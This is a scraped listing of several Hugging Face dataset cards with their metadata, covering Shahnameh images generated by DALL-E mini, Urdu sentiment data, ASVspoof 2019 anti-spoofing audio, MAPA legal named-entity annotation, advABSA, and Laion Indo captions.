[satoor](https://www.sattor.com/english/Shahnameh.pdf) - was completely in English with no alignments for the corresponding Farsi poem. We are planning to add another field to dataset entries which is the corresponding Farsi poem as soon as possible. ## Dataset Structure ### Data Fields Here is an instance of our dataset: ```json { "image": <PIL Image Bytes>, "id": 0, "text": "He took up his abode in the mountains, and clad himself and his people in tiger-skins, and from him sprang all kindly nurture and the arts of clothing, till then unknown." } ``` + `image`: the image for given text. + `id`: the id for the text (**Not for the image**). + `text`: the English text for the image. ### Data Splits This dataset has only a split (`train` split). ## Dataset Creation The translated version of the Shahnameh was generally derived from the [satoor](https://www.sattor.com/english/Shahnameh.pdf) website. We first extracted texts from the pdf. After that, we divided paragraphs into sentences and give each sentence to the DALL-E mini model through its online API. It generated nine images for each sentence. After a few annotations, we came up with more than 30000 images. ### Annotations #### Annotation process Through the process of image generation, we noticed a bias in the DALL-E models towards the word `iran`. It was biased so that each sentence with this given word would have pictures from Iran's political figures which were usually totally irrelevant. The annotation process mainly focused to deal with these pictures. We removed those images which seems to be harmful to those figures and/or were irrelevant to the context. #### Who are the annotators? Mahsa Namdar and Sadra Sabouri were the annotators of this dataset. ### Personal and Sensitive Information Since the textual data is easily downloadable and the images were generated through an image generation model there shouldn't be any personal information in this dataset. Just in case you find something harmful or violating of one's personal information please let us know. We will take proper action as soon as possible. ## Considerations for Using the Data ### Social Impact of Dataset This dataset is mainly aimed to release for its artistic value. The process of generating images for the Shahnameh - which is one of the most important Farsi poem books - is our precious contribution. This dataset is not only used for this purpose but also can as a dataset in image-to-text and text-to-image tasks. ### Discussion of Biases The dataset's possible biases would come from the DALL-E mini biases. It's actually a good practice to check the dataset entries in order to find biases in that model. One it's worth mentioning in this work is the DALL-E mini model's bias for the word `iran` which nearly always comes up with images from political figures of this country. ### Other Known Limitations There are constant debates in the literature about the limitations of machine-generated datasets. Some believe that since nowadays models are not perfect - and so do their output, it wouldn't be a good idea to use these artificially generated datasets as input to the new model. They suggest that by doing so we are actually limiting our accuracy by the model's accuracy which provided the primary dataset. ## Additional Information ### Dataset Curators + Emad Fatemizadeh: The general idea for generating a graphical version of Farsi poems was firstly introduced by him. + Sadra Sabouri: He looked up a translated version of the Shahnameh, extract and tokenized poems from it, and used the online DALL-E mini API to generate images from poems. + Mahsa Namdar: The process of annotation as a post-process on data has been held by her. ### Licensing Information MIT ### Citation Information [More Information Needed] ### Contributions Thanks to [@sadrasabouri](https://github.com/sadrasabouri) for adding this dataset.
hassan4830
null
null
null
false
1
false
hassan4830/urdu-binary-classification-data
2022-07-21T09:40:56.000Z
null
false
a5057855c7aa264709b35de7bd85258d943bec22
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/hassan4830/urdu-binary-classification-data/resolve/main/README.md
--- license: afl-3.0 --- This Urdu sentiment dataset was formed by concatenating the following two datasets: https://github.com/MuhammadYaseenKhan/Urdu-Sentiment-Corpus https://www.kaggle.com/datasets/akkefa/imdb-dataset-of-50k-movie-translated-urdu-reviews
SakaiJun
null
null
null
false
1
false
SakaiJun/github-issues
2022-07-20T07:37:59.000Z
null
false
59519e655088aa83999037b3ba8fa88d77eb3b83
[]
[]
https://huggingface.co/datasets/SakaiJun/github-issues/resolve/main/README.md
annotations_creators: [] language: - en language_creators: [] license: [] multilinguality: [] pretty_name: HuggingFace GitHub Issues size_categories: [] source_datasets: [] tags: [] task_categories: - text-classification - text-retrieval task_ids: - multi-class-classification - multi-label-classification - document-retrieval
arize-ai
null
# @InProceedings{huggingface:dataset, # title = {A great new dataset}, # author={huggingface, Inc. # }, # year={2020} # } #
This dataset was crafted to be used in our tutorial [Link to the tutorial when ready]. It consists on product reviews from an e-commerce store. The reviews are labeled on a scale from 1 to 5 (stars). The training & validation sets are fully composed by reviews written in english. However, the production set has some reviews written in spanish. At Arize, we work to surface this issue and help you solve it.
false
8
false
arize-ai/fashion_mnist_quality_drift
2022-10-25T10:40:17.000Z
null
false
fd526b15b744502f4e24b21126f543d845a8c59e
[]
[ "annotations_creators:expert-generated", "language_creators:expert-generated", "language:en", "license:mit", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:extended|imdb", "task_categories:image-classification", "task_ids:multi-class-classification" ]
https://huggingface.co/datasets/arize-ai/fashion_mnist_quality_drift/resolve/main/README.md
--- annotations_creators: - expert-generated language_creators: - expert-generated language: - en license: - mit multilinguality: - monolingual size_categories: - 10K<n<100K source_datasets: - extended|imdb task_categories: - image-classification task_ids: - multi-class-classification pretty_name: sentiment-classification-reviews-with-drift --- # Dataset Card for `reviews_with_drift` ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description ### Dataset Summary This dataset was crafted to be used in our tutorial [Link to the tutorial when ready]. It consists on a large Movie Review Dataset mixed with some reviews from a Hotel Review Dataset. The training/validation set are purely obtained from the Movie Review Dataset while the production set is mixed. Some other features have been added (`age`, `gender`, `context`) as well as a made up timestamp `prediction_ts` of when the inference took place. ### Supported Tasks and Leaderboards `text-classification`, `sentiment-classification`: The dataset is mainly used for text classification: given the text, predict the sentiment (positive or negative). ### Languages Text is mainly written in english. ## Dataset Structure ### Data Instances [More Information Needed] ### Data Fields [More Information Needed] ### Data Splits [More Information Needed] ## Dataset Creation ### Curation Rationale [More Information Needed] ### Source Data [More Information Needed] #### Initial Data Collection and Normalization [More Information Needed] #### Who are the source language producers? [More Information Needed] ### Annotations [More Information Needed] #### Annotation process [More Information Needed] #### Who are the annotators? [More Information Needed] ### Personal and Sensitive Information [More Information Needed] ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations [More Information Needed] ## Additional Information ### Dataset Curators [More Information Needed] ### Licensing Information [More Information Needed] ### Citation Information [More Information Needed] ### Contributions Thanks to [@fjcasti1](https://github.com/fjcasti1) for adding this dataset.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-xsum-6cd6bf3a-11245505
2022-07-20T07:53:57.000Z
null
false
8116d3b3bedf70dcc6f755e461f5ab499ef13e18
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:xsum" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-xsum-6cd6bf3a-11245505/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - xsum eval_info: task: summarization model: ARTeLab/it5-summarization-ilpost metrics: [] dataset_name: xsum dataset_config: default dataset_split: test col_mapping: text: document target: summary --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: ARTeLab/it5-summarization-ilpost * Dataset: xsum * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@dishant16](https://huggingface.co/dishant16) for evaluating this model.
voidful
null
null
null
false
1
false
voidful/DRCD
2022-07-20T08:33:48.000Z
null
false
591e29480dfe46d7247cbe2e9d582ec97b8fb11e
[]
[ "license:cc-by-3.0" ]
https://huggingface.co/datasets/voidful/DRCD/resolve/main/README.md
--- license: cc-by-3.0 ---
LanceaKing
null
@InProceedings{Todisco2019, Title = {{ASV}spoof 2019: {F}uture {H}orizons in {S}poofed and {F}ake {A}udio {D}etection}, Author = {Todisco, Massimiliano and Wang, Xin and Sahidullah, Md and Delgado, H ́ector and Nautsch, Andreas and Yamagishi, Junichi and Evans, Nicholas and Kinnunen, Tomi and Lee, Kong Aik}, booktitle = {Proc. of Interspeech 2019}, Year = {2019} }
This is a database used for the Third Automatic Speaker Verification Spoofing and Countermeasuers Challenge, for short, ASVspoof 2019 (http://www.asvspoof.org) organized by Junichi Yamagishi, Massimiliano Todisco, Md Sahidullah, Héctor Delgado, Xin Wang, Nicholas Evans, Tomi Kinnunen, Kong Aik Lee, Ville Vestman, and Andreas Nautsch in 2019.
false
353
false
LanceaKing/asvspoof2019
2022-11-11T08:41:54.000Z
null
false
9e3c700a884eb823b3b6c9bd993f3197cdfdacb6
[]
[ "arxiv:1911.01601", "annotations_creators:other", "language_creators:other", "language:en", "license:odc-by", "multilinguality:monolingual", "size_categories:100K<n<1M", "source_datasets:extended|vctk", "task_categories:audio-classification", "tags:voice-anti-spoofing" ]
https://huggingface.co/datasets/LanceaKing/asvspoof2019/resolve/main/README.md
--- annotations_creators: - other language_creators: - other language: - en license: - odc-by multilinguality: - monolingual size_categories: - 100K<n<1M source_datasets: - extended|vctk task_categories: - audio-classification task_ids: [] pretty_name: asvspoof2019 tags: - voice-anti-spoofing --- # Dataset Card for asvspoof2019 ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Homepage:** https://datashare.ed.ac.uk/handle/10283/3336 - **Repository:** [Needs More Information] - **Paper:** https://arxiv.org/abs/1911.01601 - **Leaderboard:** [Needs More Information] - **Point of Contact:** [Needs More Information] ### Dataset Summary This is a database used for the Third Automatic Speaker Verification Spoofing and Countermeasuers Challenge, for short, ASVspoof 2019 (http://www.asvspoof.org) organized by Junichi Yamagishi, Massimiliano Todisco, Md Sahidullah, Héctor Delgado, Xin Wang, Nicholas Evans, Tomi Kinnunen, Kong Aik Lee, Ville Vestman, and Andreas Nautsch in 2019. ### Supported Tasks and Leaderboards [Needs More Information] ### Languages English ## Dataset Structure ### Data Instances ``` {'speaker_id': 'LA_0091', 'audio_file_name': 'LA_T_8529430', 'audio': {'path': 'D:/Users/80304531/.cache/huggingface/datasets/downloads/extracted/8cabb6d5c283b0ed94b2219a8d459fea8e972ce098ef14d8e5a97b181f850502/LA/ASVspoof2019_LA_train/flac/LA_T_8529430.flac', 'array': array([-0.00201416, -0.00234985, -0.0022583 , ..., 0.01309204, 0.01339722, 0.01461792], dtype=float32), 'sampling_rate': 16000}, 'system_id': 'A01', 'key': 1} ``` ### Data Fields Logical access (LA): - `speaker_id`: `LA_****`, a 4-digit speaker ID - `audio_file_name`: name of the audio file - `audio`: A dictionary containing the path to the downloaded audio file, the decoded audio array, and the sampling rate. Note that when accessing the audio column: `dataset[0]["audio"]` the audio file is automatically decoded and resampled to `dataset.features["audio"].sampling_rate`. Decoding and resampling of a large number of audio files might take a significant amount of time. Thus it is important to first query the sample index before the `"audio"` column, *i.e.* `dataset[0]["audio"]` should **always** be preferred over `dataset["audio"][0]`. - `system_id`: ID of the speech spoofing system (A01 - A19), or, for bonafide speech SYSTEM-ID is left blank ('-') - `key`: 'bonafide' for genuine speech, or, 'spoof' for spoofing speech Physical access (PA): - `speaker_id`: `PA_****`, a 4-digit speaker ID - `audio_file_name`: name of the audio file - `audio`: A dictionary containing the path to the downloaded audio file, the decoded audio array, and the sampling rate. Note that when accessing the audio column: `dataset[0]["audio"]` the audio file is automatically decoded and resampled to `dataset.features["audio"].sampling_rate`. Decoding and resampling of a large number of audio files might take a significant amount of time. Thus it is important to first query the sample index before the `"audio"` column, *i.e.* `dataset[0]["audio"]` should **always** be preferred over `dataset["audio"][0]`. - `environment_id`: a triplet (S,R,D_s), which take one letter in the set {a,b,c} as categorical value, defined as | | a | b | c | | -------------------------------- | ------ | ------- | -------- | | S: Room size (square meters) | 2-5 | 5-10 | 10-20 | | R: T60 (ms) | 50-200 | 200-600 | 600-1000 | | D_s: Talker-to-ASV distance (cm) | 10-50 | 50-100 | 100-150 | - `attack_id`: a duple (D_a,Q), which take one letter in the set {A,B,C} as categorical value, defined as | | A | B | C | | ----------------------------------- | ------- | ------ | ----- | | Z: Attacker-to-talker distance (cm) | 10-50 | 50-100 | > 100 | | Q: Replay device quality | perfect | high | low | for bonafide speech, `attack_id` is left blank ('-') - `key`: 'bonafide' for genuine speech, or, 'spoof' for spoofing speech ### Data Splits | | Training set | Development set | Evaluation set | | -------- | ------------ | --------------- | -------------- | | Bonafide | 2580 | 2548 | 7355 | | Spoof | 22800 | 22296 | 63882 | | Total | 25380 | 24844 | 71237 | ## Dataset Creation ### Curation Rationale [Needs More Information] ### Source Data #### Initial Data Collection and Normalization [Needs More Information] #### Who are the source language producers? [Needs More Information] ### Annotations #### Annotation process [Needs More Information] #### Who are the annotators? [Needs More Information] ### Personal and Sensitive Information [Needs More Information] ## Considerations for Using the Data ### Social Impact of Dataset [Needs More Information] ### Discussion of Biases [Needs More Information] ### Other Known Limitations [Needs More Information] ## Additional Information ### Dataset Curators [Needs More Information] ### Licensing Information This ASVspoof 2019 dataset is made available under the Open Data Commons Attribution License: http://opendatacommons.org/licenses/by/1.0/ ### Citation Information ``` @InProceedings{Todisco2019, Title = {{ASV}spoof 2019: {F}uture {H}orizons in {S}poofed and {F}ake {A}udio {D}etection}, Author = {Todisco, Massimiliano and Wang, Xin and Sahidullah, Md and Delgado, H ́ector and Nautsch, Andreas and Yamagishi, Junichi and Evans, Nicholas and Kinnunen, Tomi and Lee, Kong Aik}, booktitle = {Proc. of Interspeech 2019}, Year = {2019} } ```
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-emotion-5a29f55d-11295506
2022-07-20T11:04:02.000Z
null
false
468d0b8716ec40f521f557a4617039975a3a16e4
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:emotion" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-emotion-5a29f55d-11295506/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - emotion eval_info: task: multi_class_classification model: Abdelrahman-Rezk/distilbert-base-uncased-finetuned-emotion metrics: ['bertscore'] dataset_name: emotion dataset_config: default dataset_split: validation col_mapping: text: text target: label --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Multi-class Text Classification * Model: Abdelrahman-Rezk/distilbert-base-uncased-finetuned-emotion * Dataset: emotion * Config: default * Split: validation To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@nickprock](https://huggingface.co/nickprock) for evaluating this model.
legotin
null
null
null
false
2
false
legotin/movielens-1m-ratings-standardized
2022-07-20T13:58:58.000Z
null
false
f9189e3914ce04ed0d10de11d38c145c6ee58385
[]
[ "license:apache-2.0" ]
https://huggingface.co/datasets/legotin/movielens-1m-ratings-standardized/resolve/main/README.md
--- license: apache-2.0 ---
joelito
null
null
null
false
2,332
false
joelito/mapa
2022-10-25T16:17:09.000Z
null
false
bbb2a0157b760465002fd12a61af81b475cd387a
[]
[ "annotations_creators:other", "language_creators:found", "language:multilingual", "language:bg", "language:cs", "language:da", "language:de", "language:el", "language:en", "language:es", "language:et", "language:fi", "language:fr", "language:ga", "language:hu", "language:it", "langua...
https://huggingface.co/datasets/joelito/mapa/resolve/main/README.md
--- annotations_creators: - other language_creators: - found language: - multilingual - bg - cs - da - de - el - en - es - et - fi - fr - ga - hu - it - lt - lv - mt - nl - pt - ro - sk - sv license: - cc-by-4.0 multilinguality: - multilingual size_categories: - 1K<n<10K source_datasets: - original task_categories: - token-classification task_ids: - named-entity-recognition pretty_name: Spanish Datasets for Sensitive Entity Detection in the Legal Domain tags: - named-entity-recognition-and-classification --- # Dataset Card for Multilingual European Datasets for Sensitive Entity Detection in the Legal Domain ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Homepage:** - ** Repository:** [Spanish](https://elrc-share.eu/repository/browse/mapa-anonymization-package-spanish/b550e1a88a8311ec9c1a00155d026706687917f92f64482587c6382175dffd76/), [Most](https://elrc-share.eu/repository/search/?q=mfsp:3222a6048a8811ec9c1a00155d0267067eb521077db54d6684fb14ce8491a391), [German, Portuguese, Slovak, Slovenian, Swedish](https://elrc-share.eu/repository/search/?q=mfsp:833df1248a8811ec9c1a00155d0267067685dcdb77064822b51cc16ab7b81a36) - **Paper:** de Gibert Bonet, O., García Pablos, A., Cuadros, M., & Melero, M. (2022). Spanish Datasets for Sensitive Entity Detection in the Legal Domain. Proceedings of the Language Resources and Evaluation Conference, June, 3751–3760. http://www.lrec-conf.org/proceedings/lrec2022/pdf/2022.lrec-1.400.pdf - **Leaderboard:** - **Point of Contact:** [Joel Niklaus](mailto:joel.niklaus.2@bfh.ch) ### Dataset Summary The dataset consists of 12 documents (9 for Spanish due to parsing errors) taken from EUR-Lex, a multilingual corpus of court decisions and legal dispositions in the 24 official languages of the European Union. The documents have been annotated for named entities following the guidelines of the [MAPA project]( https://mapa-project.eu/) which foresees two annotation level, a general and a more fine-grained one. The annotated corpus can be used for named entity recognition/classification. ### Supported Tasks and Leaderboards The dataset supports the task of Named Entity Recognition and Classification (NERC). ### Languages The following languages are supported: bg, cs, da, de, el, en, es, et, fi, fr, ga, hu, it, lt, lv, mt, nl, pt, ro, sk, sv ## Dataset Structure ### Data Instances The file format is jsonl and three data splits are present (train, validation and test). Named Entity annotations are non-overlapping. ### Data Fields For the annotation the documents have been split into sentences. The annotations has been done on the token level. The files contain the following data fields - `language`: language of the sentence - `type`: The document type of the sentence. Currently, only EUR-LEX is supported. - `file_name`: The document file name the sentence belongs to. - `sentence_number`: The number of the sentence inside its document. - `tokens`: The list of tokens in the sentence. - `coarse_grained`: The coarse-grained annotations for each token - `fine_grained`: The fine-grained annotations for each token As previously stated, the annotation has been conducted on a global and a more fine-grained level. The tagset used for the global and the fine-grained named entities is the following: - Address - Building - City - Country - Place - Postcode - Street - Territory - Amount - Unit - Value - Date - Year - Standard Abbreviation - Month - Day of the Week - Day - Calender Event - Person - Age - Email - Ethnic Category - Family Name - Financial - Given Name – Female - Given Name – Male - Health Insurance Number - ID Document Number - Initial Name - Marital Status - Medical Record Number - Nationality - Profession - Role - Social Security Number - Title - Url - Organisation - Time - Vehicle - Build Year - Colour - License Plate Number - Model - Type The final coarse grained tagset (in IOB notation) is the following: `['O', 'B-ORGANISATION', 'I-ORGANISATION', 'B-ADDRESS', 'I-ADDRESS', 'B-DATE', 'I-DATE', 'B-PERSON', 'I-PERSON', 'B-AMOUNT', 'I-AMOUNT', 'B-TIME', 'I-TIME']` The final fine grained tagset (in IOB notation) is the following: `[ 'O', 'B-BUILDING', 'I-BUILDING', 'B-CITY', 'I-CITY', 'B-COUNTRY', 'I-COUNTRY', 'B-PLACE', 'I-PLACE', 'B-TERRITORY', 'I-TERRITORY', 'I-UNIT', 'B-UNIT', 'B-VALUE', 'I-VALUE', 'B-YEAR', 'I-YEAR', 'B-STANDARD ABBREVIATION', 'I-STANDARD ABBREVIATION', 'B-MONTH', 'I-MONTH', 'B-DAY', 'I-DAY', 'B-AGE', 'I-AGE', 'B-ETHNIC CATEGORY', 'I-ETHNIC CATEGORY', 'B-FAMILY NAME', 'I-FAMILY NAME', 'B-INITIAL NAME', 'I-INITIAL NAME', 'B-MARITAL STATUS', 'I-MARITAL STATUS', 'B-PROFESSION', 'I-PROFESSION', 'B-ROLE', 'I-ROLE', 'B-NATIONALITY', 'I-NATIONALITY', 'B-TITLE', 'I-TITLE', 'B-URL', 'I-URL', 'B-TYPE', 'I-TYPE', ]` ### Data Splits Splits created by Joel Niklaus. | language | # train files | # validation files | # test files | # train sentences | # validation sentences | # test sentences | |:-----------|----------------:|---------------------:|---------------:|--------------------:|-------------------------:|-------------------:| | bg | 9 | 1 | 2 | 1411 | 166 | 560 | | cs | 9 | 1 | 2 | 1464 | 176 | 563 | | da | 9 | 1 | 2 | 1455 | 164 | 550 | | de | 9 | 1 | 2 | 1457 | 166 | 558 | | el | 9 | 1 | 2 | 1529 | 174 | 584 | | en | 9 | 1 | 2 | 893 | 98 | 408 | | es | 7 | 1 | 1 | 806 | 248 | 155 | | et | 9 | 1 | 2 | 1391 | 163 | 516 | | fi | 9 | 1 | 2 | 1398 | 187 | 531 | | fr | 9 | 1 | 2 | 1297 | 97 | 490 | | ga | 9 | 1 | 2 | 1383 | 165 | 515 | | hu | 9 | 1 | 2 | 1390 | 171 | 525 | | it | 9 | 1 | 2 | 1411 | 162 | 550 | | lt | 9 | 1 | 2 | 1413 | 173 | 548 | | lv | 9 | 1 | 2 | 1383 | 167 | 553 | | mt | 9 | 1 | 2 | 937 | 93 | 442 | | nl | 9 | 1 | 2 | 1391 | 164 | 530 | | pt | 9 | 1 | 2 | 1086 | 105 | 390 | | ro | 9 | 1 | 2 | 1480 | 175 | 557 | | sk | 9 | 1 | 2 | 1395 | 165 | 526 | | sv | 9 | 1 | 2 | 1453 | 175 | 539 | ## Dataset Creation ### Curation Rationale *„[…] to our knowledge, there exist no open resources annotated for NERC [Named Entity Recognition and Classificatio] in Spanish in the legal domain. With the present contribution, we intend to fill this gap. With the release of the created resources for fine-tuning and evaluation of sensitive entities detection in the legal domain, we expect to encourage the development of domain-adapted anonymisation tools for Spanish in this field“* (de Gibert Bonet et al., 2022) ### Source Data #### Initial Data Collection and Normalization The dataset consists of documents taken from EUR-Lex corpus which is publicly available. No further information on the data collection process are given in de Gibert Bonet et al. (2022). #### Who are the source language producers? The source language producers are presumably lawyers. ### Annotations #### Annotation process *"The annotation scheme consists of a complex two level hierarchy adapted to the legal domain, it follows the scheme described in (Gianola et al., 2020) […] Level 1 entities refer to general categories (PERSON, DATE, TIME, ADDRESS...) and level 2 entities refer to more fine-grained subcategories (given name, personal name, day, year, month...). Eur-Lex, CPP and DE have been annotated following this annotation scheme […] The manual annotation was performed using INCePTION (Klie et al., 2018) by a sole annotator following the guidelines provided by the MAPA consortium."* (de Gibert Bonet et al., 2022) #### Who are the annotators? Only one annotator conducted the annotation. More information are not provdided in de Gibert Bonet et al. (2022). ### Personal and Sensitive Information [More Information Needed] ## Considerations for Using the Data ### Social Impact of Dataset [More Information Needed] ### Discussion of Biases [More Information Needed] ### Other Known Limitations Note that the dataset at hand presents only a small portion of a bigger corpus as described in de Gibert Bonet et al. (2022). At the time of writing only the annotated documents from the EUR-Lex corpus were available. Note that the information given in this dataset card refer to the dataset version as provided by Joel Niklaus and Veton Matoshi. The dataset at hand is intended to be part of a bigger benchmark dataset. Creating a benchmark dataset consisting of several other datasets from different sources requires postprocessing. Therefore, the structure of the dataset at hand, including the folder structure, may differ considerably from the original dataset. In addition to that, differences with regard to dataset statistics as give in the respective papers can be expected. The reader is advised to have a look at the conversion script ```convert_to_hf_dataset.py``` in order to retrace the steps for converting the original dataset into the present jsonl-format. For further information on the original dataset structure, we refer to the bibliographical references and the original Github repositories and/or web pages provided in this dataset card. ## Additional Information ### Dataset Curators The names of the original dataset curators and creators can be found in references given below, in the section *Citation Information*. Additional changes were made by Joel Niklaus ([Email](mailto:joel.niklaus.2@bfh.ch) ; [Github](https://github.com/joelniklaus)) and Veton Matoshi ([Email](mailto:veton.matoshi@bfh.ch) ; [Github](https://github.com/kapllan)). ### Licensing Information [Attribution 4.0 International (CC BY 4.0) ](https://creativecommons.org/licenses/by/4.0/) ### Citation Information ``` @article{DeGibertBonet2022, author = {{de Gibert Bonet}, Ona and {Garc{\'{i}}a Pablos}, Aitor and Cuadros, Montse and Melero, Maite}, journal = {Proceedings of the Language Resources and Evaluation Conference}, number = {June}, pages = {3751--3760}, title = {{Spanish Datasets for Sensitive Entity Detection in the Legal Domain}}, url = {https://aclanthology.org/2022.lrec-1.400}, year = {2022} } ``` ### Contributions Thanks to [@JoelNiklaus](https://github.com/joelniklaus) and [@kapllan](https://github.com/kapllan) for adding this dataset.
becurrio
null
null
null
false
1
false
becurrio/advABSA
2022-07-21T05:57:48.000Z
null
false
e4d8ebdbd6644c78caac2655731820a7e07fd298
[]
[ "arxiv:2207.08099", "license:apache-2.0" ]
https://huggingface.co/datasets/becurrio/advABSA/resolve/main/README.md
--- license: apache-2.0 --- ## advABSA An adversarial aspect-based sentiment analysis (ABSA) benchmark, dubbed [*adv*ABSA](https://arxiv.org/pdf/2207.08099.pdf) for both aspect-based sentiment classification (SC) and opinion extraction (OE). ### *adv*ABSA (Adversarial ABSA Benchmark) In response to the concerning robustness issue of ABSA, [Arts](https://aclanthology.org/2020.emnlp-main.292.pdf) is proposed, which contains datasets crafted only for adversarial evaluaiton on SC but not for OE. So we additionally craft datasets for adversarial evaluaiton on OE following their track. These gathered datasets form *adv*ABSA. That is, *adv*ABSA can be decomposed to two parts, where the first part is Arts-\[domain\]-SC reused from Arts and the second part is Arts-\[domain\]-OE newly produced by us. ### *std*ABSA (Standard ABSA Benchmark) In addition, we also provide *std*ABSA containing datasets from SemEval14 for standard evaluation, namely Sem14-\[domain\]-SC and Sem14-\[domain\]-OE. So corresponding performance drops can be measured properly. ### Citation If you find *adv*ABSA useful, please kindly star this repositary and cite our paper as follows: ```bibtex @inproceedings{ma-etal-2022-aspect, title = "Aspect-specific Context Modeling for Aspect-based Sentiment Analysis", author = "Ma, Fang and Zhang, Chen and Zhang, Bo and Song, Dawei", booktitle = "NLPCC", month = "sep", year = "2022", address = "Guilin, China", url = "https://arxiv.org/pdf/2207.08099.pdf", } ``` ### Credits The benchmark is mainly processed by [Fang Ma](https://github.com/BD-MF).
autoevaluate
null
null
null
false
2
false
autoevaluate/autoeval-staging-eval-project-xsum-8015d52c-11325509
2022-07-20T17:31:44.000Z
null
false
88226971c2c3968d9bcef3eea281995c0313f108
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:xsum" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-xsum-8015d52c-11325509/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - xsum eval_info: task: summarization model: tuner007/pegasus_summarizer metrics: ['accuracy'] dataset_name: xsum dataset_config: default dataset_split: test col_mapping: text: document target: summary --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: tuner007/pegasus_summarizer * Dataset: xsum * Config: default * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@Neez](https://huggingface.co/Neez) for evaluating this model.
munggok
null
null
null
false
1
false
munggok/Laion_Indo
2022-07-21T20:53:47.000Z
null
false
542809bd6760d004fc0180ba3000ff3f80d29801
[]
[ "arxiv:2111.02114", "annotations_creators:found", "language_creators:found", "language:id", "license:cc-by-sa-4.0", "multilinguality:monolingual", "size_categories:10M<n<100M", "source_datasets:original", "task_categories:image-to-text", "task_ids:image-captioning" ]
https://huggingface.co/datasets/munggok/Laion_Indo/resolve/main/README.md
--- annotations_creators: - found language_creators: - found language: - id license: - cc-by-sa-4.0 multilinguality: - monolingual size_categories: - 10M<n<100M source_datasets: - original task_categories: - image-to-text task_ids: - image-captioning pretty_name: Laion Indo 70M --- # Dataset Card for Laion Indo 70M ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Dataset Preprocessing](#dataset-preprocessing) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Paper:** [LAION-400M: Open Dataset of CLIP-Filtered 400 Million Image-Text Pairs](https://arxiv.org/abs/2111.02114) ### Dataset Summary 